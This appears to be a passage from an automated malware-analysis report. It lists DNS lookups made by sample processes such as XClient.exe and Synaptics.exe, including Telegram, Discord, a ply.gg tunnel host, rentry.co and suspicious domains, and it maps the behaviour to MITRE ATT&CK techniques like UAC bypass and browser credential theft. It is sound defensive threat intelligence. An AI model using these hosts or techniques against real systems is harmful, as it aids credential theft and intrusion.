235.104.243.136.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

gstatic.com

dns

phost.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

172.217.16.227
8.8.8.8:53

d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa

dns

118 B
204 B
1
1

DNS Request

d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa
8.8.8.8:53

2.36.159.162.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

2.36.159.162.in-addr.arpa
8.8.8.8:53

227.16.217.172.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

227.16.217.172.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

XClient.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

jrockekcurje.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

phost.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.128.233

162.159.138.232

162.159.136.232

162.159.135.232

162.159.137.232
8.8.8.8:53

233.128.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.128.159.162.in-addr.arpa
8.8.8.8:53

10.110.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

10.110.18.2.in-addr.arpa
8.8.8.8:53

event-dollar.gl.at.ply.gg

dns

XClient.exe

71 B
87 B
1
1

DNS Request

event-dollar.gl.at.ply.gg

DNS Response

147.185.221.23
8.8.8.8:53

rentry.co

dns

curl.exe

55 B
103 B
1
1

DNS Request

rentry.co

DNS Response

172.67.75.40

104.26.3.16

104.26.2.16
8.8.8.8:53

40.75.67.172.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

40.75.67.172.in-addr.arpa
8.8.8.8:53

docs.google.com

dns

Synaptics.exe

61 B
77 B
1
1

DNS Request

docs.google.com

DNS Response

142.250.200.14
8.8.8.8:53

14.200.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

14.200.250.142.in-addr.arpa
8.8.8.8:53

c.pki.goog

dns

Synaptics.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

216.58.212.227
8.8.8.8:53

o.pki.goog

dns

Synaptics.exe

56 B
107 B
1
1

DNS Request

o.pki.goog

DNS Response

216.58.212.227
8.8.8.8:53

drive.usercontent.google.com

dns

Synaptics.exe

74 B
90 B
1
1

DNS Request

drive.usercontent.google.com

DNS Response

172.217.16.225
8.8.8.8:53

227.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

227.212.58.216.in-addr.arpa
8.8.8.8:53

225.16.217.172.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

225.16.217.172.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

getsolara.dev

dns

._cache_Synaptics.exe

59 B
91 B
1
1

DNS Request

getsolara.dev

DNS Response

172.67.203.125

104.21.93.27
8.8.8.8:53

172.163.59.2.in-addr.arpa

dns

142 B
102 B
2
1

DNS Request

172.163.59.2.in-addr.arpa

DNS Request

172.163.59.2.in-addr.arpa
8.8.8.8:53

125.203.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

125.203.67.172.in-addr.arpa
8.8.8.8:53

tengfeidn.com

dns

._cache_Synaptics.exe

59 B
75 B
1
1

DNS Request

tengfeidn.com

DNS Response

139.196.217.38
8.8.8.8:53

116.154.197.89.in-addr.arpa

dns

73 B
116 B
1
1

DNS Request

116.154.197.89.in-addr.arpa
8.8.8.8:53

rddissisifigifidi.net

dns

._cache_Synaptics.exe

67 B
83 B
1
1

DNS Request

rddissisifigifidi.net

DNS Response

185.215.113.66
8.8.8.8:53

188.33.110.103.in-addr.arpa

dns

73 B
161 B
1
1

DNS Request

188.33.110.103.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery